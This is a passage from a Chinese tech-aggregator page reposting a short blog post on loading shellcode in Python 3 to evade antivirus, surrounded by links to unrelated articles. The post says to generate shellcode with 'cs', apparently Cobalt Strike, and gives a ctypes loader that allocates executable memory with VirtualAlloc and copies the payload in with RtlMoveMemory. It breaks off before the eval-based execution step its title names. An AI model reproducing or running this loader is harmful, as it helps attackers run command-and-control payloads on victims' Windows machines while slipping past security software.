相关文章推荐

忧郁的火腿肠 · 收集js小技巧 - 知乎· 7 月前 ·

不敢表白的台灯 · SpringBoot + Poi + ...· 9 月前 ·

粗眉毛的刺猬 · Argument not optional ...· 10 月前 ·

玩命的青蛙 · TiDB 5.3 发版 —— ...· 1 年前 ·

一身肌肉的毛豆 · jframe关闭事件-掘金· 1 年前 ·

python3 shellcode 使用eval函数 bypass AV

2 年前 · 来自专栏漏洞推送

蓝翼

使用Python版本

使用cs生成与Python版本对应的shellcode

shellcode load

import ctypes
#shellcode加载
def shellCodeLoad(shellcode):
    ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64
    ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000),ctypes.c_int(0x40))
    buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
    ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_uint64(ptr),buf,ctypes.c_int(len(shellcode)))

推荐文章

忧郁的火腿肠 · 收集js小技巧 - 知乎

7 月前

不敢表白的台灯 · SpringBoot + Poi + ajax 实现导出 excel - MyDistance - 博客园

9 月前

粗眉毛的刺猬 · Argument not optional - Visual Basic | Microsoft Learn

10 月前

玩命的青蛙 · TiDB 5.3 发版 —— 跨越可观测性鸿沟，实现 HTAP 性能和稳定性的新飞跃 | PingCAP

1 年前

一身肌肉的毛豆 · jframe关闭事件-掘金

1 年前

今天看啥 · Py中国 · codingpro · 藏经阁 · 小百科 · link之家 · 卧龙AI搜索

删除内容请联系邮箱 2879853325@qq.com

Code - 代码工具平台